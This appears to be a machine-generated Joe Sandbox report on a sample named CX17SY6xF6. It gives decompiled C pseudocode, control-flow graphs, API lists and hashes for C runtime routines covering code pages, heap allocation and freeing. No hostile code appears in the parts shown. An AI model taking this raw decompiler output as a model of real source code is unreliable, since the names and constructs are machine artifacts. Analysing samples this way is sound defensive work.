                                                                                                                                                                                                                                                    0x010db6ee
                                                                                                                                                                                                                                                    0x010db6f4
                                                                                                                                                                                                                                                    0x010db6f8
                                                                                                                                                                                                                                                    0x010db6f8
                                                                                                                                                                                                                                                    0x010db6f9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db6f9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db6ec
                                                                                                                                                                                                                                                    0x010db701
                                                                                                                                                                                                                                                    0x010db704
                                                                                                                                                                                                                                                    0x010db707
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db707
                                                                                                                                                                                                                                                    0x010db709
                                                                                                                                                                                                                                                    0x010db709
                                                                                                                                                                                                                                                    0x010db70c
                                                                                                                                                                                                                                                    0x010db70d
                                                                                                                                                                                                                                                    0x010db710
                                                                                                                                                                                                                                                    0x010db713
                                                                                                                                                                                                                                                    0x010db713
                                                                                                                                                                                                                                                    0x010db719
                                                                                                                                                                                                                                                    0x010db71c
                                                                                                                                                                                                                                                    0x010db72b
                                                                                                                                                                                                                                                    0x010db734
                                                                                                                                                                                                                                                    0x010db739
                                                                                                                                                                                                                                                    0x010db73f
                                                                                                                                                                                                                                                    0x010db740
                                                                                                                                                                                                                                                    0x010db740
                                                                                                                                                                                                                                                    0x010db743
                                                                                                                                                                                                                                                    0x010db746
                                                                                                                                                                                                                                                    0x010db749
                                                                                                                                                                                                                                                    0x010db74c
                                                                                                                                                                                                                                                    0x010db74c
                                                                                                                                                                                                                                                    0x010db74c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db5a0
                                                                                                                                                                                                                                                    0x010db5a1
                                                                                                                                                                                                                                                    0x010db5a7
                                                                                                                                                                                                                                                    0x010db75b
                                                                                                                                                                                                                                                    0x010db76a

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 010DB14D: GetOEMCP.KERNEL32(00000000), ref: 010DB178
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,010DB41B,?,00000000), ref: 010DB5EE
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,010DB41B,?,?,?,010DB41B,?,00000000), ref: 010DB601
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                                                                                                                    • Opcode ID: f97738702412299f4ce5fc1e608dfae3ddb438f04f616b3b751ea3932ce9046a
                                                                                                                                                                                                                                                    • Instruction ID: 3fd70eccafb41437fc6db9f21abe7db8e13fc99ba34d1d4d314b659e1b6e6b90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f97738702412299f4ce5fc1e608dfae3ddb438f04f616b3b751ea3932ce9046a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20515770A003069FEB259F79C880AFEBFF5EF46300F1A40AED1D68B241D6399541CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 211 10db3b9-10db3e3 call 10d9c30 call 10db4d8 call 10db14d 218 10db3e9-10db3fe call 10dbd19 211->218 219 10db3e5-10db3e7 211->219 223 10db42e 218->223 224 10db400-10db416 call 10db57a 218->224 220 10db43c-10db43f 219->220 226 10db430-10db43b call 10da6da 223->226 227 10db41b-10db421 224->227 226->220 229 10db440-10db444 227->229 230 10db423-10db428 call 10d9826 227->230 233 10db44b-10db456 229->233 234 10db446 call 10d9de4 229->234 230->223 236 10db46d-10db487 233->236 237 10db458-10db462 233->237 234->233 236->226 240 10db489-10db490 236->240 237->236 239 10db464-10db46c call 10da6da 237->239 239->236 240->226 242 10db492-10db4a9 call 10db023 240->242 242->226 246 10db4ab-10db4b5 242->246 246->226
                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E010DB3B9(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                    				char _t31;
                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                    				char _t40;
                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                    				char _t45;
                                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t81 = __eflags;
                                                                                                                                                                                                                                                    				_v8 = E010D9C30(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                    				E010DB4D8(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                    				_t31 = E010DB14D(_t81, _a4);
                                                                                                                                                                                                                                                    				_v16 = _t31;
                                                                                                                                                                                                                                                    				_t57 =  *(_v8 + 0x48);
                                                                                                                                                                                                                                                    				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                                                                                                    				_t70 = E010DBD19(_t57, 0x220);
                                                                                                                                                                                                                                                    				_t51 = __ebx | 0xffffffff;
                                                                                                                                                                                                                                                    				__eflags = _t70;
                                                                                                                                                                                                                                                    				if(__eflags == 0) {
                                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                                    					_t75 = _t51;
                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                                                                                                                                                                                                                    					 *_t70 =  *_t70 & 0x00000000; // executed
                                                                                                                                                                                                                                                    					_t36 = E010DB57A(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
                                                                                                                                                                                                                                                    					_t75 = _t36;
                                                                                                                                                                                                                                                    					__eflags = _t75 - _t51;
                                                                                                                                                                                                                                                    					if(_t75 != _t51) {
                                                                                                                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                                                                                                                    							E010D9DE4();
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                                    						__eflags = _t51 == 1;
                                                                                                                                                                                                                                                    						if(_t51 == 1) {
                                                                                                                                                                                                                                                    							_t45 = _v8;
                                                                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x116dae0;
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t45 + 0x48)) != 0x116dae0) {
                                                                                                                                                                                                                                                    								E010DA6DA( *((intOrPtr*)(_t45 + 0x48)));
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *_t70 = 1;
                                                                                                                                                                                                                                                    						_t64 = _t70;
                                                                                                                                                                                                                                                    						_t70 = 0;
                                                                                                                                                                                                                                                    						 *(_v8 + 0x48) = _t64;
                                                                                                                                                                                                                                                    						_t40 = _v8;
                                                                                                                                                                                                                                                    						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                                                                                                                                                                                                                    						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                    							__eflags =  *0x116dd04 & 0x00000001;
                                                                                                                                                                                                                                                    							if(( *0x116dd04 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                    								_v16 =  &_v8;
                                                                                                                                                                                                                                                    								E010DB023(5,  &_v16);
                                                                                                                                                                                                                                                    								__eflags = _a8;
                                                                                                                                                                                                                                                    								if(_a8 != 0) {
                                                                                                                                                                                                                                                    									_t44 =  *0x116dd00; // 0xdc2bf0
                                                                                                                                                                                                                                                    									 *0x116d7cc = _t44;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                    						E010DA6DA(_t70);
                                                                                                                                                                                                                                                    						return _t75;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(E010D9826())) = 0x16;
                                                                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                    0x010db3b9
                                                                                                                                                                                                                                                    0x010db3c6
                                                                                                                                                                                                                                                    0x010db3c9
                                                                                                                                                                                                                                                    0x010db3d1
                                                                                                                                                                                                                                                    0x010db3da
                                                                                                                                                                                                                                                    0x010db3dd
                                                                                                                                                                                                                                                    0x010db3e3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db3e5
                                                                                                                                                                                                                                                    0x010db3e9
                                                                                                                                                                                                                                                    0x010db3f6
                                                                                                                                                                                                                                                    0x010db3f8
                                                                                                                                                                                                                                                    0x010db3fc
                                                                                                                                                                                                                                                    0x010db3fe
                                                                                                                                                                                                                                                    0x010db42e
                                                                                                                                                                                                                                                    0x010db42e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db400
                                                                                                                                                                                                                                                    0x010db40d
                                                                                                                                                                                                                                                    0x010db413
                                                                                                                                                                                                                                                    0x010db416
                                                                                                                                                                                                                                                    0x010db41b
                                                                                                                                                                                                                                                    0x010db41f
                                                                                                                                                                                                                                                    0x010db421
                                                                                                                                                                                                                                                    0x010db440
                                                                                                                                                                                                                                                    0x010db444
                                                                                                                                                                                                                                                    0x010db446
                                                                                                                                                                                                                                                    0x010db446
                                                                                                                                                                                                                                                    0x010db451
                                                                                                                                                                                                                                                    0x010db455
                                                                                                                                                                                                                                                    0x010db456
                                                                                                                                                                                                                                                    0x010db458
                                                                                                                                                                                                                                                    0x010db45b
                                                                                                                                                                                                                                                    0x010db462
                                                                                                                                                                                                                                                    0x010db467
                                                                                                                                                                                                                                                    0x010db46c
                                                                                                                                                                                                                                                    0x010db462
                                                                                                                                                                                                                                                    0x010db46d
                                                                                                                                                                                                                                                    0x010db473
                                                                                                                                                                                                                                                    0x010db478
                                                                                                                                                                                                                                                    0x010db47a
                                                                                                                                                                                                                                                    0x010db47d
                                                                                                                                                                                                                                                    0x010db480
                                                                                                                                                                                                                                                    0x010db487
                                                                                                                                                                                                                                                    0x010db489
                                                                                                                                                                                                                                                    0x010db490
                                                                                                                                                                                                                                                    0x010db495
                                                                                                                                                                                                                                                    0x010db49e
                                                                                                                                                                                                                                                    0x010db4a3
                                                                                                                                                                                                                                                    0x010db4a9
                                                                                                                                                                                                                                                    0x010db4ab
                                                                                                                                                                                                                                                    0x010db4b0
                                                                                                                                                                                                                                                    0x010db4b0
                                                                                                                                                                                                                                                    0x010db4a9
                                                                                                                                                                                                                                                    0x010db490
                                                                                                                                                                                                                                                    0x010db430
                                                                                                                                                                                                                                                    0x010db431
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db423
                                                                                                                                                                                                                                                    0x010db428
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db428
                                                                                                                                                                                                                                                    0x010db421

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 010D9C30: GetLastError.KERNEL32(?,?,010D5EB1,?,?,?,010D4B88,?), ref: 010D9C34
                                                                                                                                                                                                                                                      • Part of subcall function 010D9C30: _free.LIBCMT ref: 010D9C67
                                                                                                                                                                                                                                                      • Part of subcall function 010D9C30: SetLastError.KERNEL32(00000000,?), ref: 010D9CA8
                                                                                                                                                                                                                                                      • Part of subcall function 010D9C30: _abort.LIBCMT ref: 010D9CAE
                                                                                                                                                                                                                                                      • Part of subcall function 010DB4D8: _abort.LIBCMT ref: 010DB50A
                                                                                                                                                                                                                                                      • Part of subcall function 010DB4D8: _free.LIBCMT ref: 010DB53E
                                                                                                                                                                                                                                                      • Part of subcall function 010DB14D: GetOEMCP.KERNEL32(00000000), ref: 010DB178
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DB431
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DB467
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                                                                                                                    • Opcode ID: eb9b80e9dbdbdb46cafb7d37f27fd9601044b715d91b6c3cfc8a8385babd0990
                                                                                                                                                                                                                                                    • Instruction ID: a3b15f26bc1175a05d0206cfe8146037c47764ec57fd429541f2a2dfe69fe9b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb9b80e9dbdbdb46cafb7d37f27fd9601044b715d91b6c3cfc8a8385babd0990
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4431F431A04309EFDB15EFA9E440BAD7BF4EF52364F264199E4849B2A1EF329D40CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 270 10e1d69-10e1d76 call 10da67d 272 10e1d7b-10e1d86 270->272 273 10e1d8c-10e1d94 272->273 274 10e1d88-10e1d8a 272->274 275 10e1dd4-10e1de2 call 10da6da 273->275 276 10e1d96-10e1d9a 273->276 274->275 277 10e1d9c-10e1dce call 10da986 276->277 282 10e1dd0-10e1dd3 277->282 282->275
                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                    			E010E1D69(void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                                                    				char _t16;
                                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                    				char _t31;
                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_push(_t26);
                                                                                                                                                                                                                                                    				_push(_t26);
                                                                                                                                                                                                                                                    				_t16 = E010DA67D(_t26, 0x40, 0x30); // executed
                                                                                                                                                                                                                                                    				_t31 = _t16;
                                                                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                                                                    				_t28 = _t30;
                                                                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                                                                    					_t2 = _t31 + 0xc00; // 0xc00
                                                                                                                                                                                                                                                    					_t17 = _t2;
                                                                                                                                                                                                                                                    					__eflags = _t31 - _t17;
                                                                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                                                                    						_t3 = _t31 + 0x20; // 0x20
                                                                                                                                                                                                                                                    						_t35 = _t3;
                                                                                                                                                                                                                                                    						_t33 = _t17;
                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                    							_t4 = _t35 - 0x20; // 0x0
                                                                                                                                                                                                                                                    							E010DA986(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                                                                                                                                                                                                                    							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                                                                                                                                                                                                                    							 *_t35 = 0;
                                                                                                                                                                                                                                                    							_t35 = _t35 + 0x30;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                                                                                                                                                                                                                    							 *((char*)(_t35 - 0x24)) = 0xa;
                                                                                                                                                                                                                                                    							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                                                                                                                                                                                                                    							 *((char*)(_t35 - 0x22)) = 0;
                                                                                                                                                                                                                                                    							__eflags = _t35 - 0x20 - _t33;
                                                                                                                                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                                                                                                                                    						_t31 = _v12;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t31 = 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E010DA6DA(0);
                                                                                                                                                                                                                                                    				return _t31;
                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                    0x010e1d6e
                                                                                                                                                                                                                                                    0x010e1d6f
                                                                                                                                                                                                                                                    0x010e1d76
                                                                                                                                                                                                                                                    0x010e1d7b
                                                                                                                                                                                                                                                    0x010e1d7f
                                                                                                                                                                                                                                                    0x010e1d83
                                                                                                                                                                                                                                                    0x010e1d86
                                                                                                                                                                                                                                                    0x010e1d8c
                                                                                                                                                                                                                                                    0x010e1d8c
                                                                                                                                                                                                                                                    0x010e1d92
                                                                                                                                                                                                                                                    0x010e1d94
                                                                                                                                                                                                                                                    0x010e1d97
                                                                                                                                                                                                                                                    0x010e1d97
                                                                                                                                                                                                                                                    0x010e1d9a
                                                                                                                                                                                                                                                    0x010e1d9c
                                                                                                                                                                                                                                                    0x010e1da2
                                                                                                                                                                                                                                                    0x010e1da6
                                                                                                                                                                                                                                                    0x010e1dab
                                                                                                                                                                                                                                                    0x010e1daf
                                                                                                                                                                                                                                                    0x010e1db1
                                                                                                                                                                                                                                                    0x010e1db4
                                                                                                                                                                                                                                                    0x010e1dba
                                                                                                                                                                                                                                                    0x010e1dc1
                                                                                                                                                                                                                                                    0x010e1dc5
                                                                                                                                                                                                                                                    0x010e1dc9
                                                                                                                                                                                                                                                    0x010e1dcc
                                                                                                                                                                                                                                                    0x010e1dcc
                                                                                                                                                                                                                                                    0x010e1dd0
                                                                                                                                                                                                                                                    0x010e1dd3
                                                                                                                                                                                                                                                    0x010e1d88
                                                                                                                                                                                                                                                    0x010e1d88
                                                                                                                                                                                                                                                    0x010e1d88
                                                                                                                                                                                                                                                    0x010e1dd5
                                                                                                                                                                                                                                                    0x010e1de2

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 010DA67D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,010D9C5E,00000001,00000364,?,010D4B88,?), ref: 010DA6BE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E1DD5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                                                                                                                    • Opcode ID: 92a6ae2d68cf9dbe8d0c4afe4cf0655b852b6560beefab47e5d447839bfd82a0
                                                                                                                                                                                                                                                    • Instruction ID: 19bbf5e524810d09113349c075ccd30e5c9156201353fb8ff0b65030d8729145
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92a6ae2d68cf9dbe8d0c4afe4cf0655b852b6560beefab47e5d447839bfd82a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7014976204305EFE321AF6AD84499AFBE8FBC9270F250A1DE1D483280EB30A805C774
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 283 10da67d-10da688 284 10da68a-10da694 283->284 285 10da696-10da69c 283->285 284->285 286 10da6ca-10da6d5 call 10d9826 284->286 287 10da69e-10da69f 285->287 288 10da6b5-10da6c6 RtlAllocateHeap 285->288 293 10da6d7-10da6d9 286->293 287->288 289 10da6c8 288->289 290 10da6a1-10da6a8 call 10dc742 288->290 289->293 290->286 296 10da6aa-10da6b3 call 10dc6ac 290->296 296->286 296->288
                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E010DA67D(void* __ecx, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                                    				signed int _t18;
                                                                                                                                                                                                                                                    				long _t19;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                    					_t19 = _t18 * _a8;
                                                                                                                                                                                                                                                    					if(_t19 == 0) {
                                                                                                                                                                                                                                                    						_t19 = _t19 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						_t8 = RtlAllocateHeap( *0x116e1b0, 8, _t19); // executed
                                                                                                                                                                                                                                                    						if(_t8 != 0) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						__eflags = E010DC742();
                                                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(E010D9826())) = 0xc;
                                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t12 = E010DC6AC(_t15, _t19, __eflags, _t19);
                                                                                                                                                                                                                                                    						_pop(_t15);
                                                                                                                                                                                                                                                    						__eflags = _t12;
                                                                                                                                                                                                                                                    						if(_t12 == 0) {
                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return _t8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t13 = 0xffffffe0;
                                                                                                                                                                                                                                                    				if(_t13 / _t18 < _a8) {
                                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                    0x010da67d
                                                                                                                                                                                                                                                    0x010da683
                                                                                                                                                                                                                                                    0x010da688
                                                                                                                                                                                                                                                    0x010da696
                                                                                                                                                                                                                                                    0x010da696
                                                                                                                                                                                                                                                    0x010da69c
                                                                                                                                                                                                                                                    0x010da69e
                                                                                                                                                                                                                                                    0x010da69e
                                                                                                                                                                                                                                                    0x010da6b5
                                                                                                                                                                                                                                                    0x010da6be
                                                                                                                                                                                                                                                    0x010da6c6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da6a6
                                                                                                                                                                                                                                                    0x010da6a8
                                                                                                                                                                                                                                                    0x010da6ca
                                                                                                                                                                                                                                                    0x010da6cf
                                                                                                                                                                                                                                                    0x010da6d5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da6d5
                                                                                                                                                                                                                                                    0x010da6ab
                                                                                                                                                                                                                                                    0x010da6b0
                                                                                                                                                                                                                                                    0x010da6b1
                                                                                                                                                                                                                                                    0x010da6b3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da6b3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da6b5
                                                                                                                                                                                                                                                    0x010da68e
                                                                                                                                                                                                                                                    0x010da694
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,010D9C5E,00000001,00000364,?,010D4B88,?), ref: 010DA6BE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: f4d64c4f9cbe079e232e0d0c0cc025cf8db8e7e5c03cae573f22a41621453af5
                                                                                                                                                                                                                                                    • Instruction ID: cbf85c8c4f9f8b8c63e3b5c52081c2d142083dd2d88fc1e82f5363d968561ff9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4d64c4f9cbe079e232e0d0c0cc025cf8db8e7e5c03cae573f22a41621453af5
